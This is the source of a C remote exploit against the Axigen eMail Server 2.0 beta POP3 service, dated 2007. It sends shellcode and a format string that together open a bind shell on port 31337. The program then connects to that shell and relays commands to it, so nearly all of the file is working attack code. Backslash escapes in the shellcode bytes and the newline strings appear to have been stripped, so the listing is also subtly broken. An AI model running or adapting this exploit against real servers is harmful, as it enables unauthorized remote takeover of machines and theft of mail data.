
# Title : Axigen eMail Server 2.0.0b2 (pop3) Remote Format String Exploit
# Published : 2007-02-18
# Author : fuGich


/* axiagen.c
 *
 * Axigen eMail Server v2.0 (beta)
 * 	by fuGich Tue Dec 5 2006
 *
 * 		thanks to mu-b
 *
 * - Tested on: Axigen V2 (beta)
 *
 *   logType for the pop3 service must be "system" and 
 *   the logLevel set to any number with 4th bit set
 *
 * remote shell format string vulnerability in pop3
 * 	/bin/sh to bind to port 31337
 *
 * optimised format string generated with libforSC
 * the writes use %hhn; %hn would have worked as well, but this form was small enough and keeps the generated log entry shorter
 * 
 */

#include <errno.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/select.h>
#include <unistd.h>


/* Port of the target pop3 service; PORT_POP3 is just an alias of DEF_PORT (110). */
#define DEF_PORT    110
#define PORT_POP3   DEF_PORT


/*
 * Payload buffer that formatme() sends verbatim to the pop3 service.  Its
 * layout follows the section comments below: a PLT fixup stub, the
 * bind-shell code (port 31337, see the file header), nine little-endian
 * write-target addresses around 0x0985bed8, and finally the printf-style
 * format string whose %n / %hhn conversions perform the writes when the
 * server logs the line.
 *
 * NOTE(review): the "x.." byte tokens in this listing appear to have lost
 * their backslash escapes during extraction; as printed, the literal holds
 * those characters as plain text rather than the bytes the inline
 * comments name.
 */
char formatString[] =
	
	// plt fixup code

	"xbaxd8xbex85x09"		// mov    $0x985bed8,%edx
	"xc7x02x9axf0x04x08"	// movl   $0x804f09a,(%edx)
	"x8dx52x04"			// lea    0x4(%edx),%edx
	"xc6x02xaa"			// movb   $0xaa,(%edx)
	"x90x90x90"			// make divisible by 8
	
	//
	// bind shell with fork to port 31337 98 bytes
	//

	"x6ax66"              // push $0x66 
	"x58"                  // pop %eax 
	"x99"                  // cltd 
	"x6ax01"              // push $0x1 
	"x5b"                  // pop %ebx 
	"x52"                  // push %edx 
	"x53"                  // push %ebx 
	"x6ax02"              // push $0x2 

	//
	// <_doint>:
	//

	"x89xe1"              // mov %esp,%ecx 
	"xcdx80"              // int $0x80 

	"x5b"                  // pop %ebx 
	"x5d"                  // pop %ebp 
	"x52"                  // push %edx 
	"x66xbdx69x7a"      // mov $0x7a69,%bp (0x7a69 = 31337)
	"x0fxcd"              // bswap %ebp 
	"x09xdd"              // or %ebx,%ebp 
	"x55"                  // push %ebp 
	"x6ax10"              // push $0x10 
	"x51"                  // push %ecx 
	"x50"                  // push %eax 
	"x89xe1"              // mov %esp,%ecx 
	"xb0x66"              // mov $0x66,%al 
	"xcdx80"              // int $0x80 
	"xb3x04"              // mov $0x4,%bl 
	"xb0x66"              // mov $0x66,%al 
	"xcdx80"              // int $0x80 

	//
	// <_acceptloop>:
	//

	"x5f"                  // pop %edi 
	"x50"                  // push %eax 
	"x50"                  // push %eax 
	"x57"                  // push %edi 
	"x89xe1"              // mov %esp,%ecx 
	"x43"                  // inc %ebx 
	"xb0x66"              // mov $0x66,%al 
	"xcdx80"              // int $0x80 
	"x93"                  // xchg %eax,%ebx 
	"xb0x02"              // mov $0x2,%al 
	"xcdx80"              // int $0x80 
	"x85xc0"              // test %eax,%eax 
	"x75x1a"              // jne <_parent> 
	"x59"                  // pop %ecx 

	//
	// <_dup2loop>:
	//

	"xb0x3f"              // mov $0x3f,%al 
	"xcdx80"              // int $0x80 
	"x49"                  // dec %ecx 
	"x79xf9"              // jns <_dup2loop> 

	"xb0x0b"              // mov $0xb,%al 
	"x68x2fx2fx73x68"  // push $0x68732f2f 
	"x68x2fx62x69x6e"  // push $0x6e69622f 
	"x89xe3"              // mov %esp,%ebx 
	"x52"                  // push %edx 
	"x53"                  // push %ebx 
	"xebxb2"              // jmp <_doint> 

	//
	// <_parent>:
	//

	"x6ax06"              // push $0x6 
	"x58"                  // pop %eax 
	"xcdx80"              // int $0x80 
	"xb3x04"              // mov $0x4,%bl 
	"xebxc9"              // jmp <_acceptloop>

	//
	// 9 write addresses
	//

	"xd8xbex85x09"	// pointer @ 0x0985bed8
	"xd9xbex85x09"
	"xdaxbex85x09"
	"xdbxbex85x09"
	"xe0xbex85x09"	// place shell code @ 0x0985bee0
	"xe1xbex85x09"
	"xe2xbex85x09"
	"xe3xbex85x09"
	"xe4xbex85x09"

	// add the format string

	"%18u%66$n%34u%65$hhn%31u%72$hhn%10u%68$hhn%31u%71$hhn%87u%70$hhn%14u%69$hhn%90u%73$hhn%158u%67$hhnrn";


/* Forward declarations.  sock_send/sockami/formatme are file-local helpers;
 * shell is the only function defined with external linkage. */
static int sock_send (int sock, u_char * src, int len);
static void formatme (u_char * host);
static int sockami (u_char * host, int port);
void shell (int sock);

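/* Write all `n` bytes of `p` to `fd`, resuming after partial writes and
 * EINTR.  Returns 0 on success, -1 with errno set on any other error. */
static int shell_write_all (int fd, const char *p, size_t n)
{
	while (n > 0) {
		ssize_t w = write (fd, p, n);
		if (w < 0) {
			if (errno == EINTR)
				continue;
			return -1;
		}
		p += w;
		n -= (size_t) w;
	}
	return 0;
}

void shell (int sock){		/* Attach to Remote Shell */

	/*
	 * Interactive relay: copy stdin (fd 0) to `sock` and `sock` to stdout
	 * (fd 1) until one side closes or a read fails.  Never returns; every
	 * exit path calls exit(EXIT_FAILURE), as the original did.  `sock`
	 * must be a connected stream socket; it is not closed here because
	 * process exit releases it.
	 */
	int     l;
	char    buf[512];
	fd_set  rfds;

	while (1) {
		/* select() overwrites the set, so it is rebuilt on every pass.
		 * FD_ZERO was missing in the original, which fed an
		 * uninitialised fd_set to the first select() call. */
		FD_ZERO (&rfds);
		FD_SET (0, &rfds);
		FD_SET (sock, &rfds);
		if (select (sock + 1, &rfds, NULL, NULL, NULL) == -1) {
			if (errno == EINTR)
				continue;	/* interrupted by a signal: wait again */
			perror ("select()");
			exit (EXIT_FAILURE);
		}
		if (FD_ISSET (0, &rfds)) {
			l = read (0, buf, sizeof (buf));
			if (l <= 0) {
				printf("n - Connection closed by local usern");
				exit (EXIT_FAILURE);
			}
			/* write() may be short on a socket; push every byte read. */
			if (shell_write_all (sock, buf, (size_t) l) == -1) {
				perror ("write(sock)");
				exit (EXIT_FAILURE);
			}
		}
		if (FD_ISSET (sock, &rfds)) {
			l = read (sock, buf, sizeof (buf));
			if (l == 0) {
				printf ("n - Connection closed by remote host.n");
				exit (EXIT_FAILURE);
			} else if (l < 0) {
				printf ("n - Read failuren");
				exit (EXIT_FAILURE);
			}
			if (shell_write_all (1, buf, (size_t) l) == -1) {
				perror ("write(stdout)");
				exit (EXIT_FAILURE);
			}
		}
	}
}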

static int sock_send (int sock, u_char * src, int len){		/* send data to the open socket */

	/* Thin wrapper over send(2) with no flags.  Returns exactly what send()
	 * returns: the number of bytes queued, or -1 with errno set.  A short
	 * send is not retried; that is the caller's concern. */
	return send (sock, src, len, 0);
}

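static int sockami (u_char * host, int port){	/* create the socket */

	/*
	 * Resolve `host`, open a TCP socket and connect it to `host:port`.
	 * Returns the connected descriptor, which the caller owns.  Every
	 * failure is fatal: it is reported on stderr and the process exits
	 * with EXIT_FAILURE (the original mixed exit(-1) and
	 * exit(EXIT_FAILURE); both are now the same status).
	 */
	struct sockaddr_in address;
	struct hostent *hp;
	int sock;

	fflush (stdout);	/* show the progress line before a possibly slow connect */
	if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1){
		perror ("socket()");
		exit (EXIT_FAILURE);
	}

	/* gethostbyname() reports failures via h_errno, not errno, so perror()
	 * would print an unrelated message here; print our own instead. */
	if ((hp = gethostbyname ((const char *) host)) == NULL){
		fprintf (stderr, "gethostbyname(): cannot resolve %s\n", (const char *) host);
		exit (EXIT_FAILURE);
	}

	/* The original copied h_length bytes into sin_addr unchecked; only an
	 * IPv4 address of exactly sizeof sin_addr bytes fits there. */
	if (hp->h_addrtype != AF_INET
	    || hp->h_length != (int) sizeof address.sin_addr
	    || hp->h_addr_list[0] == NULL) {
		fprintf (stderr, "gethostbyname(): no IPv4 address for %s\n", (const char *) host);
		exit (EXIT_FAILURE);
	}

	memset (&address, 0, sizeof (address));
	memcpy (&address.sin_addr, hp->h_addr_list[0], sizeof address.sin_addr);
	address.sin_family = AF_INET;
	address.sin_port = htons (port);

	if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1){
		perror ("connect()");
		exit (EXIT_FAILURE);
	}
	return (sock);
}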

static void formatme (u_char * host){	/* do the evil */

	/* Drive the whole sequence: connect to the pop3 port, deliver the
	 * payload buffer, pause two seconds for the server to process it, then
	 * connect to port 31337 and hand that socket to shell().  Does not
	 * return normally, because shell() only leaves via exit().  The
	 * pop3 socket is deliberately left open, as in the original. */
	int pop3_sock;
	int shell_sock;

	printf ("+Connecting to %s:%d ", host, PORT_POP3);	
	pop3_sock = sockami (host, PORT_POP3);
	printf ("n+Sending format stringn");
	/* Result of sock_send() is not inspected; the original ignored it too. */
	(void) sock_send (pop3_sock, (u_char *) formatString, strlen (formatString));
	fflush (stdout);
	sleep(2);	
	printf ("+Connecting to Shell ");	
	shell_sock = sockami (host, 31337);
	printf ("- Donen");
	shell (shell_sock);

}

int main (int argc, char **argv){	/* go figure */

	printf ("Axigen 2.0 beta Remote pop3 exploitn"
		"by: <fuGich@gmail.com>nn");

	if (argc <= 1)
	{
		fprintf (stderr, "Usage: %s <host>nn", argv[0]);
		exit (EXIT_SUCCESS);
	}

	formatme (argv[1]);
}
